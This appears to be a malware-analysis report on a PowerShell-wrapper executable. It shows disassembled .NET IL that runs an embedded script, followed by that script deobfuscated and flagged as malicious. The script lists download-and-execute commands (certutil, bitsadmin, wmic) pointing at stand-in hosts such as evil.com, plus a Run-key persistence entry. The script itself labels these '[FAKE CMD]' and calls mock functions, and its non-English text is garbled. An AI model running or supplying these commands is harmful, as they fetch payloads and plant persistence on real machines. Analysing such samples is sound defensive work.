ldc.i4.1 <null> stloc.1 <null> br IL_024B: ldloc.s V_9 ldloc.s V_12 ldstr -extract ldc.i4.3 <null> callvirt System.Boolean System.String::StartsWith(System.String,System.StringComparison) brfalse.s IL_01D2: ldloc.s V_12 ldloc.s V_12 ldc.i4.1 <null> newarr System.String stloc.s V_33 ldloc.s V_33 ldc.i4.0 <null> ldstr : stelem.ref <null> ldloc.s V_33 ldc.i4.2 <null> ldc.i4.1 <null> callvirt System.String[] System.String::Split(System.String[],System.Int32,System.StringSplitOptions) stloc.s V_13 ldloc.s V_13 ldlen <null> conv.i4 <null> ldc.i4.2 <null> beq.s IL_01B6: ldloc.s V_13 ldstr If you specify the -extract option you need to add a file for extraction in this way -extract:"<filename>" call System.Void System.Console::WriteLine(System.String) ldc.i4.1 <null> stloc.s V_30 leave IL_065A: ldloc.s V_30 ldloc.s V_13 ldc.i4.1 <null> ldelem.ref <null> ldc.i4.1 <null> newarr System.Char stloc.s V_34 ldloc.s V_34 ldc.i4.0 <null> ldc.i4.s 34 stelem.i2 <null> ldloc.s V_34 callvirt System.String System.String::Trim(System.Char[]) stloc.2 <null> br.s IL_024B: ldloc.s V_9 ldloc.s V_12 ldstr -end ldc.i4.1 <null> call System.Int32 System.String::Compare(System.String,System.String,System.Boolean) brtrue.s IL_01E9: ldloc.s V_12 ldloc.s V_9 ldc.i4.1 <null> add <null> stloc.s V_8 br.s IL_0262: call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() ldloc.s V_12 ldstr -? ldc.i4.1 <null> call System.Int32 System.String::Compare(System.String,System.String,System.Boolean) brtrue.s IL_01FD: ldloc.s V_10 ldc.i4.1 <null> stloc.s V_10 br.s IL_024B: ldloc.s V_9 ldloc.s V_10 brfalse.s IL_0234: ldloc.s V_12 ldloc.s V_12 ldstr -detailed ldc.i4.1 <null> call System.Int32 System.String::Compare(System.String,System.String,System.Boolean) brfalse.s IL_022E: ldloc.s V_12 ldloc.s V_12 ldstr -examples ldc.i4.1 <null> call System.Int32 System.String::Compare(System.String,System.String,System.Boolean) brfalse.s IL_022E: ldloc.s V_12 ldloc.s V_12 ldstr -full ldc.i4.1 <null> call System.Int32 System.String::Compare(System.String,System.String,System.Boolean) brtrue.s IL_024B: ldloc.s V_9 ldloc.s V_12 stloc.s V_11 br.s IL_024B: ldloc.s V_9 ldloc.s V_12 ldstr -debug ldc.i4.1 <null> call System.Int32 System.String::Compare(System.String,System.String,System.Boolean) brtrue.s IL_024B: ldloc.s V_9 call System.Boolean System.Diagnostics.Debugger::Launch() pop <null> br.s IL_0262: call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() ldloc.s V_9 ldc.i4.1 <null> add <null> stloc.s V_9 ldloc.s V_32 ldc.i4.1 <null> add <null> stloc.s V_32 ldloc.s V_32 ldloc.s V_31 ldlen <null> conv.i4 <null> blt IL_0153: ldloc.s V_31 call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() stloc.s V_14 ldloc.s V_14 ldstr power9.ps1 callvirt System.IO.Stream System.Reflection.Assembly::GetManifestResourceStream(System.String) stloc.s V_15 ldloc.s V_15 call System.Text.Encoding System.Text.Encoding::get_UTF8() newobj System.Void System.IO.StreamReader::.ctor(System.IO.Stream,System.Text.Encoding) stloc.s V_16 ldloc.s V_16 callvirt System.String System.IO.TextReader::ReadToEnd() stloc.s V_17 ldloc.2 <null> call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_02A6: ldloc.s V_10 ldloc.2 <null> ldloc.s V_17 call System.Void System.IO.File::WriteAllText(System.String,System.String) ldc.i4.0 <null> stloc.s V_30 leave IL_065A: ldloc.s V_30 ldloc.s V_10 brfalse.s IL_031E: ldloc.s V_24 ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldc.i4.s 9 newarr System.String stloc.s V_35 ldloc.s V_35 ldc.i4.0 <null> ldstr function stelem.ref <null> ldloc.s V_35 ldc.i4.1 <null> call System.AppDomain System.AppDomain::get_CurrentDomain() callvirt System.String System.AppDomain::get_FriendlyName() stelem.ref <null> ldloc.s V_35 ldc.i4.2 <null> ldstr { stelem.ref <null> ldloc.s V_35 ldc.i4.3 <null> ldloc.s V_17 stelem.ref <null> ldloc.s V_35 ldc.i4.4 <null> ldstr }; Get-Help stelem.ref <null> ldloc.s V_35 ldc.i4.5 <null> call System.AppDomain System.AppDomain::get_CurrentDomain() callvirt System.String System.AppDomain::get_FriendlyName() stelem.ref <null> ldloc.s V_35 ldc.i4.6 <null> ldstr stelem.ref <null> ldloc.s V_35 ldc.i4.7 <null> ldloc.s V_11 stelem.ref <null> ldloc.s V_35 ldc.i4.8 <null> ldstr | Out-String stelem.ref <null> ldloc.s V_35 call System.String System.String::Concat(System.String[]) callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddScript(System.String) pop <null> br.s IL_032D: leave.s IL_033B ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldloc.s V_17 callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddScript(System.String) pop <null> leave.s IL_033B: leave.s IL_0349 ldloc.s V_16 brfalse.s IL_033A: endfinally ldloc.s V_16 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_0349: ldloc.s V_10 ldloc.s V_15 brfalse.s IL_0348: endfinally ldloc.s V_15 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.s V_10 brtrue IL_0575: ldloc.s V_24 ldnull <null> stloc.s V_18 ldstr ^-([^: ]+)[ :]?([^:]*)$ newobj System.Void System.Text.RegularExpressions.Regex::.ctor(System.String) stloc.s V_19 ldloc.s V_8 stloc.s V_20 br IL_0534: ldloc.s V_20 ldloc.s V_19 ldarg.0 <null> ldloc.s V_20 ldelem.ref <null> callvirt System.Text.RegularExpressions.Match System.Text.RegularExpressions.Regex::Match(System.String) stloc.s V_21 ldloc.s V_21 callvirt System.Boolean System.Text.RegularExpressions.Group::get_Success() brfalse IL_0501: ldloc.s V_18 ldloc.s V_21 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() callvirt System.Int32 System.Text.RegularExpressions.GroupCollection::get_Count() ldc.i4.3 <null> bne.un IL_0501: ldloc.s V_18 ldarg.0 <null> ldloc.s V_20 ldelem.ref <null> ldloca.s V_22 call System.Boolean System.Double::TryParse(System.String,System.Double&) brtrue IL_0501: ldloc.s V_18 ldloc.s V_18 brfalse.s IL_03B6: ldloc.s V_21 ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldloc.s V_18 callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddParameter(System.String) pop <null> ldloc.s V_21 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.2 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() callvirt System.String System.String::Trim() ldstr call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_03F2: ldloc.s V_21 ldloc.s V_21 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.1 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() stloc.s V_18 br IL_052E: ldloc.s V_20 ldloc.s V_21 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.2 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() ldstr True call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_0433: ldloc.s V_24 ldloc.s V_21 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.2 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() callvirt System.String System.String::ToUpper() ldstr $TRUE call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_0460: ldloc.s V_21 ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldloc.s V_21 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.1 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() ldc.i4.1 <null> box System.Boolean callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddParameter(System.String,System.Object) pop <null> ldnull <null> stloc.s V_18 br IL_052E: ldloc.s V_20 ldloc.s V_21 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.2 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() ldstr False call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_04A1: ldloc.s V_24 ldloc.s V_21 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.2 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() callvirt System.String System.String::ToUpper() ldstr $FALSE call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_04CB: ldloc.s V_24 ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldloc.s V_21 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.1 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() ldc.i4.0 <null> box System.Boolean callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddParameter(System.String,System.Object) pop <null> ldnull <null> stloc.s V_18 br.s IL_052E: ldloc.s V_20 ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldloc.s V_21 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.1 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() ldloc.s V_21 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.2 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddParameter(System.String,System.Object) pop <null> ldnull <null> stloc.s V_18 br.s IL_052E: ldloc.s V_20 ldloc.s V_18 brfalse.s IL_051D: ldloc.s V_24 ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldloc.s V_18 ldarg.0 <null> ldloc.s V_20 ldelem.ref <null> callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddParameter(System.String,System.Object) pop <null> ldnull <null> stloc.s V_18 br.s IL_052E: ldloc.s V_20 ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldarg.0 <null> ldloc.s V_20 ldelem.ref <null> callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddArgument(System.Object) pop <null> ldloc.s V_20 ldc.i4.1 <null> add <null> stloc.s V_20 ldloc.s V_20 ldarg.0 <null> ldlen <null> conv.i4 <null> blt IL_0368: ldloc.s V_19 ldloc.s V_18 brfalse.s IL_0551: ldloc.s V_24 ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldloc.s V_18 callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddParameter(System.String) pop <null> ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldstr Out-String callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddCommand(System.String) pop <null> ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldstr Stream callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddParameter(System.String) pop <null> ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldloc.s V_5 ldloc.s V_7 ldnull <null> ldloc.s V_28 brtrue.s IL_0594: ldloc.s V_28 ldloc.s V_29 ldftn System.Void ModuleNameSpace.MainApp/<>c__DisplayClass8::<Main>b__4(System.IAsyncResult) newobj System.Void System.AsyncCallback::.ctor(System.Object,System.IntPtr) stloc.s V_28 ldloc.s V_28 ldnull <null> callvirt System.IAsyncResult System.Management.Automation.PowerShell::BeginInvoke<System.String,System.Management.Automation.PSObject>(System.Management.Automation.PSDataCollection`1<System.String>,System.Management.Automation.PSDataCollection`1<System.Management.Automation.PSObject>,System.Management.Automation.PSInvocationSettings,System.AsyncCallback,System.Object) pop <null> ldloc.0 <null> callvirt System.Boolean ModuleNameSpace.MainApp::get_ShouldExit() brtrue.s IL_05B5: ldloc.s V_24 ldloc.s V_29 ldfld System.Threading.ManualResetEvent ModuleNameSpace.MainApp/<>c__DisplayClass8::mre ldc.i4.s 100 callvirt System.Boolean System.Threading.WaitHandle::WaitOne(System.Int32) brfalse.s IL_059D: ldloc.0 ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh callvirt System.Void System.Management.Automation.PowerShell::Stop() ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh callvirt System.Management.Automation.PSInvocationStateInfo System.Management.Automation.PowerShell::get_InvocationStateInfo() callvirt System.Management.Automation.PSInvocationState System.Management.Automation.PSInvocationStateInfo::get_State() ldc.i4.5 <null> bne.un.s IL_05F7: leave.s IL_060F ldloc.s V_29 ldfld ModuleNameSpace.MainModuleUI ModuleNameSpace.MainApp/<>c__DisplayClass8::ui ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh callvirt System.Management.Automation.PSInvocationStateInfo System.Management.Automation.PowerShell::get_InvocationStateInfo() callvirt System.Exception System.Management.Automation.PSInvocationStateInfo::get_Reason() callvirt System.String System.Exception::get_Message() callvirt System.Void System.Management.Automation.Host.PSHostUserInterface::WriteErrorLine(System.String) leave.s IL_060F: ldloc.s V_4 ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh brfalse.s IL_060E: endfinally ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.s V_4 callvirt System.Void System.Management.Automation.Runspaces.Runspace::Close() leave.s IL_0624: leave.s IL_0640 ldloc.s V_4 brfalse.s IL_0623: endfinally ldloc.s V_4 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_0640: ldloc.1 stloc.s V_25 ldstr An exception occured: call System.Void System.Console::Write(System.String) ldloc.s V_25 callvirt System.String System.Exception::get_Message() call System.Void System.Console::WriteLine(System.String) leave.s IL_0640: ldloc.1 ldloc.1 <null> brfalse.s IL_0653: ldloc.0 ldstr Hit any key to exit... call System.Void System.Console::WriteLine(System.String) call System.ConsoleKeyInfo System.Console::ReadKey() pop <null> ldloc.0 <null> callvirt System.Int32 ModuleNameSpace.MainApp::get_ExitCode() ret <null> ldloc.s V_30 ret <null> |
|
Name0 | Value |
|---|---|
| PE Layout | MemoryMapped (process dump suspected) |
| Deobfuscated PowerShell | @("certutil -urlcache -split -f http://malicious-site.com/payload.exe C:\Windows\Temp\payload.exe", "bitsadmin /transfer myjob /download /priority normal http://evil.com/backdoor.exe C:\temp\svchost.exe", "wmic process get brief /format:"http://malicious-server.com/trojan.xsl"", "reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsUpdate" /t REG_SZ /d "C:\malware.exe" /f") foreach ($cmd in $suspiciousCommands) { Write-Host "[FAKE CMD] $cmd" -ForegroundColor "DarkYellow" } Write-Host "[!] ???????????????????????????? CMD ?????????????? '??????????????????'" -ForegroundColor "Red" disable-antivirusmock add-totaskschedulermock new-fakesystemfolder new-fakesvchost encrypt-fakefolder fake-miner rename-tosvchost invoke-suspiciouscmd Write-Host " [???????????????????????? ??????????????????] ?????? ??????-?????????????? ??????????????????!" -ForegroundColor "White" -BackgroundColor "DarkGreen" |
| PE Layout | MemoryMapped (process dump suspected) |
|
Name0 | Value | Location |
|---|---|---|
| PE Layout | MemoryMapped (process dump suspected) |
8fb788ba54fadf27b7597680b2d7ac6d |
| Deobfuscated PowerShell | @("certutil -urlcache -split -f http://malicious-site.com/payload.exe C:\Windows\Temp\payload.exe", "bitsadmin /transfer myjob /download /priority normal http://evil.com/backdoor.exe C:\temp\svchost.exe", "wmic process get brief /format:"http://malicious-server.com/trojan.xsl"", "reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsUpdate" /t REG_SZ /d "C:\malware.exe" /f") foreach ($cmd in $suspiciousCommands) { Write-Host "[FAKE CMD] $cmd" -ForegroundColor "DarkYellow" } Write-Host "[!] ???????????????????????????? CMD ?????????????? '??????????????????'" -ForegroundColor "Red" disable-antivirusmock add-totaskschedulermock new-fakesystemfolder new-fakesvchost encrypt-fakefolder fake-miner rename-tosvchost invoke-suspiciouscmd Write-Host " [???????????????????????? ??????????????????] ?????? ??????-?????????????? ??????????????????!" -ForegroundColor "White" -BackgroundColor "DarkGreen" Malicious |
8fb788ba54fadf27b7597680b2d7ac6d > .Net Resources > power9.ps1 > [PowerShell Command] |
| PE Layout | MemoryMapped (process dump suspected) |
8fb788ba54fadf27b7597680b2d7ac6d > [Rebuild from dump]_438a2ed1.exe |